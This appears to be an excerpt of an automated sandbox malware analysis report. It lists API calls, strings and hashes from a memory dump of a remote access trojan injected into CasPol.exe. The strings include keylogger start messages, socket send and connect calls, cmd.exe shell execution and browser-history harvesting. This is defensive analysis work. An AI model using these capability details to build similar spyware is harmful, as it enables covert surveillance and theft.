                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction ID: 91eee74bc7ca160cae255ad37e89f65ee2415c19472677646c1a5aeb81073604
                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                            • Instruction Fuzzy Hash: 8AF030B69002A9BACB30ABD69C0EFDF7F7DEBC6B11F00042AB615A6051D6745144CAB9
                                                                                                            APIs
                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002), ref: 004425F9
                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044260C
                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,0044258A,?,?,0044252A,?,0046DAE0,0000000C,00442681,?,00000002,00000000), ref: 0044262F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                            • Opcode ID: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction ID: 32bca75c9846dbfd0145c2b425e1dcbc158e0b1ec8d75d3d798e8c7ef3c4518a
                                                                                                            • Opcode Fuzzy Hash: 84f8467b83475f4999ab7b265d6d7c22c059d91a263d45f4d19e228ed4a2ac86
                                                                                                            • Instruction Fuzzy Hash: 14F04430904209FBDB169FA5ED09B9EBFB5EB08756F4140B9F805A2251DF749D40CA9C
                                                                                                            APIs
                                                                                                            • RegCreateKeyW.ADVAPI32(80000001,00000000,BG), ref: 0041277F
                                                                                                            • RegSetValueExW.ADVAPI32(BG,?,00000000,00000001,00000000,00000000,004742F8,?,0040E5CB,pth_unenc,004742E0), ref: 004127AD
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040E5CB,pth_unenc,004742E0), ref: 004127B8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateValue
                                                                                                            • String ID: pth_unenc$BG
                                                                                                            • API String ID: 1818849710-2233081382
                                                                                                            • Opcode ID: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                            • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                            • Opcode Fuzzy Hash: ac20c6f818266d456b173dad8d641fd48acc3e355ae729c9f48089b2aa064521
                                                                                                            • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                            APIs
                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004745A8,00414DB5,00000000,00000000,00000001), ref: 00404AED
                                                                                                            • SetEvent.KERNEL32(?), ref: 00404AF9
                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404B04
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00404B0D
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                            • String ID: KeepAlive | Disabled
                                                                                                            • API String ID: 2993684571-305739064
                                                                                                            • Opcode ID: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                            • Instruction ID: d6da77504ed7f85403cc54e6f32b3900d2337039667ff8d97479a9328fe4a552
                                                                                                            • Opcode Fuzzy Hash: 526203e9eca74a7ac11616e6de4b704dd5e98db1e732fd16a6fd45517b5b1fbb
                                                                                                            • Instruction Fuzzy Hash: F8F0BBB19043007FDB1137759D0E66B7F58AB46325F00457FF892926F1DA38D890875B
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                            • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                            • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                            • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                            • String ID: Alarm triggered
                                                                                                            • API String ID: 614609389-2816303416
                                                                                                            • Opcode ID: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                            • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                            • Opcode Fuzzy Hash: ca31e2b0ec9ffc7d76ba02616ca36f971eae7819ef66c75d3d88d4c06d2fc62c
                                                                                                            • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041BF02), ref: 0041BE79
                                                                                                            • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BE86
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041BF02), ref: 0041BE93
                                                                                                            • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041BF02), ref: 0041BEA6
                                                                                                            Strings
                                                                                                            • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041BE99
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                            • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                            • API String ID: 3024135584-2418719853
                                                                                                            • Opcode ID: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                            • Instruction ID: 2ebb83c1e7e70c4501562f07591cf8b091918c9767bda4cb27a2f29097fd03e7
                                                                                                            • Opcode Fuzzy Hash: ebe4511383e55350cb7437214035f9f9245c880b4d311b5a557d4aca1c5ac6fb
                                                                                                            • Instruction Fuzzy Hash: C7E04F62104348ABD31437F5BC8ECAB3B7CE784613B100536F612903D3EA7484448A79
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • Opcode ID: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                            • Instruction ID: 5f24fa964153eb206603784754227e3bedeb81a57cd12874f4c303f17d5dd595
                                                                                                            • Opcode Fuzzy Hash: 5145828a6066f50cf31ff859ee0e23af4d85e603a01b225214a849b1d7000abc
                                                                                                            • Instruction Fuzzy Hash: FD71C231900216DBEB218F55C884ABFBB75FF55360F14026BEE10A7281D7B89D61CBA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004105B9: SetLastError.KERNEL32(0000000D,00410B38,?,00000000), ref: 004105BF
                                                                                                            • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410BC4
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410C2A
                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410C31
                                                                                                            • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410D3F
                                                                                                            • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410B15), ref: 00410D69
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                                                                            • API String ID: 3525466593-0
                                                                                                            • Opcode ID: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                            • Instruction ID: 414678d8c61d87a8872ee73c425a8c4ab38aff0ef96490e16bc3f9b9534d1ba0
                                                                                                            • Opcode Fuzzy Hash: 79ee37443a4366c3bbea1b893000b12d050509257f9cb6c9a6ccb14135485088
                                                                                                            • Instruction Fuzzy Hash: 1861C270200301ABD720DF66C981BA77BE6BF44744F04412AF9058B786EBF8E8C5CB99
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E6C1
                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 0040E6E5
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E6F4
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E8AB
                                                                                                              • Part of subcall function 0041B187: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040E4D0,00000000,?,?,00474358), ref: 0041B19C
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
                                                                                                              • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E89C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                            • API String ID: 4269425633-0
                                                                                                            • Opcode ID: 964a5a3bd7df0bd74af3a8e998dd8357b76ed2a5e21fcabead6c3b94faed0554
                                                                                                            • Instruction ID: 1ccfc3ca83e07eb3b8bade3b71d1bee95701cef3987deea6625860c00c24977f
                                                                                                            • Opcode Fuzzy Hash: 964a5a3bd7df0bd74af3a8e998dd8357b76ed2a5e21fcabead6c3b94faed0554
                                                                                                            • Instruction Fuzzy Hash: F641E1311083415BC325F761D8A1AEFB7E9EFA4305F50453EF84A931E1EF389A49C65A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E3ED,?,00000000,?,00000001,?,?,00000001,0043E3ED,?), ref: 0044FF20
• __alloca_probe_16.LIBCMT ref: 0044FF58
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044FFA9
• GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004399BF,?), ref: 0044FFBB
• __freea.LIBCMT ref: 0044FFC4
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
• String ID:
• API String ID: 313313983-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044E144
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E167
  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E18D
• _free.LIBCMT ref: 0044E1A0
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E1AF
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
• String ID:
• API String ID: 336800556-0
APIs
• GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445359,00440A9B,00000000,?,?,?,?,00440C7E,00000000,0000000A,000000FF,0000000A,00000000), ref: 00446F48
• _free.LIBCMT ref: 00446F7D
• _free.LIBCMT ref: 00446FA4
• SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FB1
• SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 00446FBA
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
APIs
• _free.LIBCMT ref: 0044F7B5
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 0044F7C7
• _free.LIBCMT ref: 0044F7D9
• _free.LIBCMT ref: 0044F7EB
• _free.LIBCMT ref: 0044F7FD
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• _free.LIBCMT ref: 00443305
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
• _free.LIBCMT ref: 00443317
• _free.LIBCMT ref: 0044332A
• _free.LIBCMT ref: 0044333B
• _free.LIBCMT ref: 0044334C
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ProcessWindow$Open$TextThreadVisible
• String ID: (FG
• API String ID: 3142014140-2273637114
APIs
• _strpbrk.LIBCMT ref: 0044D4A8
• _free.LIBCMT ref: 0044D5C5
  • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,00000000,0000000A,0000000A,00000000,0041AD67,00000022,?,?,0043A833,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
  • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417,0000000A,00000000), ref: 0043A878
  • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
APIs
• GetKeyboardLayoutNameA.USER32(?), ref: 00409601
  • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
  • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
  • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateFileKeyboardLayoutNameconnectsendsocket
• String ID: XCG$`AG$>G
• API String ID: 2334542088-2372832151
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
• _free.LIBCMT ref: 004427DF
• _free.LIBCMT ref: 004427E9
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
• API String ID: 2506810119-3657627342
APIs
• send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
• SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID: LAL
• API String ID: 3963590051-3302426157
                                                                                                            • Opcode ID: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                            • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                            • Opcode Fuzzy Hash: 70199d1238e0ed40ec4566022559ff14c6a96e51f72a9672ed76f9bbc42e0496
                                                                                                            • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
• Opcode ID: 5f1f106a8e53b5b8e53ee6433b744230dbb61b51347ea29cf6ce568f23d562fb
• Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
• Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
APIs
• GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
• wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: EventLocalTimewsprintf
• String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
• API String ID: 1497725170-1359877963
• Opcode ID: fcd139a15132826d048fc9099f5513e63a32d772a8cf7c4d95b98b470fd5f9fd
• Instruction ID: 8a7b6ca92c081f7f17d03b5bac770d689c192d548357e869dbc211d44db93d1d
• Instruction Fuzzy Hash: BB118172400118AACB18BB56EC55CFE77BCAE48325F00013FF842620D1EF7C5A86C6E9
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040A691
• CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 0040A69D
• CreateThread.KERNEL32(00000000,00000000,004099C1,?,00000000,00000000), ref: 0040A6A9
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTime$wsprintf
• String ID: Online Keylogger Started
• API String ID: 112202259-1258561607
• Opcode ID: 54b0b085ce57371670bcfd3b34d5d472438fbf033b6369da0e754369fe511495
• Instruction ID: 3917ec9fcb61ff418b23047d8298326e5ff7fd14d64f683336ff9c65b5464130
• Instruction Fuzzy Hash: DE01C4916003093AE62076368C87DBF3A6DCA813A8F40043EF541362C3E97D5D5582FB
APIs
• CloseHandle.KERNEL32(00000000,00000000,`@,?,0044A991,`@,0046DD28,0000000C), ref: 0044AAC9
• GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
• __dosmaperr.LIBCMT ref: 0044AAFE
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID: `@
• API String ID: 2583163307-951712118
• Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
• Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
• Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
APIs
• WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
• CloseHandle.KERNEL32(?,?,?,?,00404B26), ref: 00404B98
• SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseEventHandleObjectSingleWait
• String ID: Connection Timeout
• API String ID: 2055531096-499159329
• Opcode ID: 9041f7ae570b413ce327d744802055146d1c38930b1ad49fa8d24b0939116539
• Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
• Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
  • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
• __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
• String ID: bad locale name
• API String ID: 3628047217-1405518554
• Opcode ID: 2c952230bb5508a40ba9b400b3509c8dd800ec2376424fb743b9d3d13ecaa97f
• Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
• Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
APIs
• ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
Strings
Memory Dump Source
• Source File: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ExecuteShell
• String ID: /C $cmd.exe$open
• API String ID: 587946157-3896048727
• Opcode ID: 6699625853e23096ac9cad3f7578a7bff2c993ae7ed2a6c2b658dd2f5a42760b
• Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
